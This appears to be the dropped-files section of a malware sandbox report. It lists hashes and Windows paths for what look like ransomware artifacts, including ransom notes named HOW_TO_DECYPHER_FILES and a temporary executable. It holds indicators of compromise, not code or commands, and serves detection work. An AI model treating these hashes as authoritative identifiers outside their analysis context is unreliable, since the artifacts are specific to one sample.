MD5 d717a5921753b2b308ac23a86db9fd25
SHA1 f24623960772a86aa47cc8eaaca1c23ad9f20bc1
SHA256 9b9a8caa58197e3709a0811b92ca312378fcb755e6cc1707b4f53d8c1ca95929
SHA512 0a557f861a97a964c14fa76de4b1120d54cbd5f6db0c5a672fc59d4a7ee864d6c532a2d771d234c7e6320f266bfc7f72457f4141aaf0bcd91befb75623354259

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5 6781ac6cfd7c82f4ee7c1f3c5785c565
SHA1 b523ec6d2588eba58ec7b084bc46561d43c3c157
SHA256 58eb76fc7ff697302e82adccc59811a739ee2ef999ec034e4f761390ba81bf9c
SHA512 538a79497005b4173bd09e7d29c896ec244c1a6c3194c9af23737b75c3a285e04b748d0a049225ad50fed43d1e21246f279eb8cebb4e686eee78ddb33b763c76

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\HOW_TO_DECYPHER_FILES.txt

MD5 f0cfddce754a35e52dc4c0ed0eaca07e
SHA1 1acfd52bda6df1ae258fd408c7f3fd627af0ffb8
SHA256 e89ef91610e81b1dc16c04bbae9b65c8dfaaa1b1756f4fe9755483ed95b576ae
SHA512 f928420ba7a51126be9723c3ab62a98a7a3c7c6b8c9fec291cd65491203f37cccb707ee78dd42ec82db8e3cbd64701113a66de7e471c5bb42eb7e95bd6946262

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\HOW_TO_DECYPHER_FILES.txt

MD5 bda99dc37896638504a482323b315069
SHA1 274774d9026553980de89273bac43e438555c3bf
SHA256 726bc80aeb7dba825e13df848b05cf73397094b0c526f912c78dfb0f3e0fb714
SHA512 6ddd1417b7bed451ded6814945d09e676b5b889ae51c6334e9b3596b558b62a24c64e8cc78491e9f6dfa85f83746b5042d4ca90ac991a397ff9b0fb6d898f021

C:\Users\Admin\AppData\Local\Temp\fu025osp.exe

MD5 3e0a2f96bc02b82231e877553e444bd5
SHA1 3a673de3878e3af6914fe47cf0413ec72b8b7f89
SHA256 18118e97f1a328f5a68f3a200e9db1ea6c1f225d025cd06afa4662f1aac4e96c
SHA512 acc53f6c8c467a63f53afae02386171fb8d5474728059dfed48f759f81cfa4e385c3ebaed453abaf8841fef76e53e3a247f99db021a98babafcfec0aa357d97a